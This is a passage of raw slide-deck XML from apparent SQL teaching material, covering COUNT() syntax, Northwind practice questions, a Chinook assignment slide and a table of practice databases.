                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Select DISTINCT country from customer</a:t>
            </a:r>
            <a:endParaRPr sz="2450">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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3" name="Shape 3283"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3284" name="Google Shape;3284;p530"/>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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3150" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>SQL COUNT() Function</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2733">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3285" name="Google Shape;3285;p5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chemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>COUNT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>table_name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>condition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="2550">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2150">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="2150">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2150">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>COUNT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>table_name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>condition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="3050">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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9" name="Shape 3289"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3290" name="Google Shape;3290;p531"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="716950"/>
            <a:ext cx="8520600" cy="3852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Select the top 5 customers who have made the highest total purchases.</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Find the ten least ordered products.</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Select the employees who have processed orders in all the different months.</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Find the customers who have placed orders in consecutive months.</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Select the products that have not been ordered in the last 90 days.</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Find the average time between consecutive orders for each customer.</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Select the employees who have processed orders for more than one country.</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List the customers who have placed orders for products from all categories.</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Find the total sales for each month in the year 1997.</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t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3291" name="Google Shape;3291;p531"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270275" y="132050"/>
            <a:ext cx="86529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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Northwind</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Advanced SQL Questions</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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5" name="Shape 3295"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3296" name="Google Shape;3296;p532"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270275" y="1400475"/>
            <a:ext cx="8588100" cy="338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solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Consider the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Chinook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sample tables:</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3297" name="Google Shape;3297;p532"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="957300" y="611325"/>
            <a:ext cx="73161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SQL Assignments 4</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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1" name="Shape 3301"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3302" name="Google Shape;3302;p533"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1246150"/>
            <a:ext cx="8520600" cy="194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800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Best Databases </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Practice</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4800">
              <a:solidFill>
                <a:schemeClr val="accen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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to connect to a server without password?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="406" name="Google Shape;406;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6" name="Shape 3306"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3307" name="Google Shape;3307;p534"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="149038" y="157113"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1510050"/>
                <a:gridCol w="2008850"/>
                <a:gridCol w="1565125"/>
                <a:gridCol w="1517625"/>
                <a:gridCol w="1177000"/>
                <a:gridCol w="1045100"/>
              </a:tblGrid>
              <a:tr h="539725">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200"/>
                        <a:t>Category</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200"/>
                        <a:t>Database</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200"/>
                        <a:t>Schema</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200"/>
                        <a:t>Size</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200"/>
                        <a:t>Provided For</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Provided By</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="323825">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1200"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Ecommerce</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1200"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="accent3"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId3">
                            <a:extLst>
                              <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                                <ahyp:hlinkClr val="tx"/>
                              </a:ext>
                            </a:extLst>
                          </a:hlinkClick>
                        </a:rPr>
                        <a:t>Northwind</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>View</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000"/>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000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>607 KB</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MySQL</a:t>
